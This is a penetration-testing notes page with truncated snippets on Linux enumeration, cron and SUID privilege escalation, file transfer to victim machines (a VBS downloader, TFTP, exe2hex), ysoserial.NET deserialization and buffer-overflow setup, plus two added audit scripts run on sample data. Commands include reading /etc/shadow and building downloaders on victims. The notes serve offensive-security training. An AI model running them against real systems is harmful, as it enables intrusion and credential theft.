Shuciran Pentesting Notes

System (Linux)

Distribution: ls /etc/*-release; cat /etc/os-release; cat /etc/issue; uname -a; cat /proc/version
Interesting files: cat /etc/passwd; cat /etc/group; cat /etc/shadow; cat /etc/hosts; ls -lh /var/mail/; ls -...
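Reading /etc/passwd by eye is error-prone on a host with dozens of service accounts. The script below is an added example, not part of the original notes: it applies the three checks a practitioner actually makes on that file (interactive shells, extra UID 0 accounts, and password fields that are not shadowed). The passwd content is a constructed sample and the function names (interactive_accounts, uid0_accounts, unshadowed_accounts, write_sample_passwd) are mine; point the functions at a copy pulled from a target the same way.

```shell
#!/bin/sh
# Added example (not from the original notes): sift a passwd file for the
# entries that matter during enumeration. The file path is a parameter so
# the checks can run on a copy taken from a target, not only on /etc/passwd.

# Accounts whose login shell is interactive (skip nologin/false and the
# sync/halt/shutdown pseudo-shells).
interactive_accounts() {
  awk -F: '$7 !~ /(nologin|false|sync|halt|shutdown)$/ { print $1 }' "$1"
}

# Every UID 0 account. Anything besides root is a backdoor or a misconfiguration.
uid0_accounts() {
  awk -F: '$3 == 0 { print $1 }' "$1"
}

# Entries whose password field is neither "x" (shadowed) nor a lock marker
# ("*" or "!"): an empty field means login with no password, anything else
# is a hash sitting in a world-readable file, ready for offline cracking.
unshadowed_accounts() {
  awk -F: '$2 != "x" && $2 !~ /^[*!]/ { print $1 ":" ($2 == "" ? "<empty>" : $2) }' "$1"
}

# Constructed sample passwd (sample data, not taken from any real host).
write_sample_passwd() {
  cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
toor:x:0:0:second root:/root:/bin/bash
legacy:$1$abc$defghijklmnopqrstuv:1002:1002:old app:/home/legacy:/bin/sh
guest::1003:1003:guest:/home/guest:/bin/sh
shuciran:x:1000:1000::/home/shuciran:/bin/bash
EOF
}

# Stand-alone run against the sample.
sample=$(mktemp)
write_sample_passwd "$sample"
echo "== interactive accounts";  interactive_accounts "$sample"
echo "== UID 0 accounts";        uid0_accounts "$sample"
echo "== unshadowed entries";    unshadowed_accounts "$sample"
rm -f "$sample"
```

On the sample the last check flags two entries: legacy carries a hash directly in passwd, and guest has an empty field, which on most PAM setups means no password is asked for at all.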

Jobs and Tasks

List cron jobs: cat /etc/crontab && ls -al /etc/cron*
Find world-writable cron jobs: find /etc/cron* -type f -perm -o+w -exec ls -l {} \;
Find cron jobs owned by other users: find /etc/cro...

FTP (tcp-21)

Upload: change into the directory that contains the file and use ONLY the file name, otherwise you'll receive a 500 error. In the ftp client:
passive # must be off
binary # to upload binaries, execute th...

Insecure File Permissions (Linux)

Writable and executable file: in order to leverage insecure file permissions, we must locate an executable file that not only allows us write access but also runs at an elevated privilege level. Use...
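The cron search in "Jobs and Tasks" and the writable-executable search in this section are the same hunt: a file that root (or cron on root's behalf) will execute and that we can write to. The script below is an added example serving both sections; it is not code from the original notes. It goes one step past `find /etc/cron* -perm -o+w` by parsing the crontab entries themselves and checking the script each one invokes, and it adds the SUID case. The directory tree, crontab and function names (find_world_writable, find_writable_suid, is_world_writable, writable_cron_targets, build_sample) are constructed assumptions; on a target you would pass /etc and /etc/crontab instead.

```shell
#!/bin/sh
# Added example (not from the original notes): find files that run with
# elevated privilege yet are writable by everyone. Two sources are checked:
# scripts referenced from a system crontab (they run as the user in the
# sixth field, usually root) and SUID binaries. Paths are parameters so the
# functions can be pointed at /etc or at a constructed tree.

# Regular files under $1 that are world-writable.
find_world_writable() {
  find "$1" -type f -perm -0002 2>/dev/null | sort
}

# Regular files under $1 that are SUID and world-writable: replace the file
# and the payload runs as the file's owner the next time it is executed.
find_writable_suid() {
  find "$1" -type f -perm -4000 -perm -0002 2>/dev/null | sort
}

# True when $1 is a regular file whose "other" write bit is set.
is_world_writable() {
  [ -f "$1" ] && [ -n "$(find "$1" -prune -perm -0002 2>/dev/null)" ]
}

# Read a system-format crontab ($1) and print "user<TAB>script" for every
# entry whose script (first word of the command) is world-writable.
# Handles both "m h dom mon dow user command" and "@reboot user command";
# blank lines, comments and NAME=value environment lines are skipped.
writable_cron_targets() {
  local crontab_file line user script
  crontab_file=$1
  while IFS= read -r line || [ -n "$line" ]; do
    set -f; set -- $line; set +f      # split on whitespace; -f keeps "*" from globbing
    [ $# -eq 0 ] && continue          # blank line
    case "$1" in
      \#*) continue ;;                # comment
      [A-Za-z_]*=*) continue ;;       # SHELL=, PATH=, MAILTO= ...
      @*) user=$2 script=$3 ;;        # @reboot user command
      *)  user=$6 script=$7 ;;        # m h dom mon dow user command
    esac
    if is_world_writable "$script"; then
      printf '%s\t%s\n' "$user" "$script"
    fi
  done < "$crontab_file"
}

# Constructed sample tree under $1 (sample data, not a real host): a crontab
# plus the files it references, with deliberately mixed permissions.
build_sample() {
  local d=$1
  for f in backup.sh rotate.sh start.sh suidtool; do
    printf '#!/bin/sh\necho running %s\n' "$f" > "$d/$f"
  done
  chmod 777 "$d/backup.sh"    # world-writable, run by cron as root
  chmod 755 "$d/rotate.sh"    # correct permissions
  chmod 666 "$d/start.sh"     # world-writable, run at boot as root
  chmod 4777 "$d/suidtool"    # SUID and world-writable
  cat > "$d/crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
*/5 *  * * *   root    $d/backup.sh
0   2  * * *   root    $d/rotate.sh --all
@reboot        root    $d/start.sh
17  *  * * *   root    cd / && run-parts --report /etc/cron.hourly
EOF
  chmod 644 "$d/crontab"
}

# Stand-alone run against the sample.
tmp=$(mktemp -d)
build_sample "$tmp"
echo "== world-writable files";               find_world_writable "$tmp"
echo "== writable SUID binaries";             find_writable_suid "$tmp"
echo "== cron entries with writable targets"; writable_cron_targets "$tmp/crontab"
rm -rf "$tmp"
```

Two limits worth knowing before trusting a clean result: the first-word heuristic sees only `cd` in `cd / && run-parts ...` and only `/bin/sh` in `/bin/sh /opt/job.sh`, so wrapper commands and interpreter-invoked scripts need a manual look; and a script that is itself read-only is still a target if its parent directory, or a directory earlier in the crontab's PATH, is writable by us.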

VBS Download

From the victim machine command shell use this list of commands, which write wget.vbs one line at a time:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQ...

Uploading files using TFTP (older Windows Systems)

During a penetration test, we can use TFTP to transfer files from older Windows operating systems up to Windows XP and 2003. This is a terrific tool for non-interactive file transfer, but it is not...

Downloads with exe2hex and Powershell

exe2hex compresses the binary we want to transfer, converts it to a hex string, and embeds it in a Windows script. On the Windows machine, we will paste this script into our shel...

Deserialization Attack

Ysoserial.NET: this tool only runs on Windows. After downloading it we need to identify the gadget chain (-g) that matches the library or program running the code and the formatter (-f) that performs the deseri...

Cross-Compiling Exploit Code

mingw-w64: in order to avoid compilation issues, it is generally recommended to use native compilers for the specific operating system targeted by the code; however, this may not always be an option...

Buffer Overflow (Linux)

First we need to disable ASLR on Kali for testing (the setting does not survive a reboot): echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Setting up the EDB debugger: first thing, it runs with the following command: root@debian:~...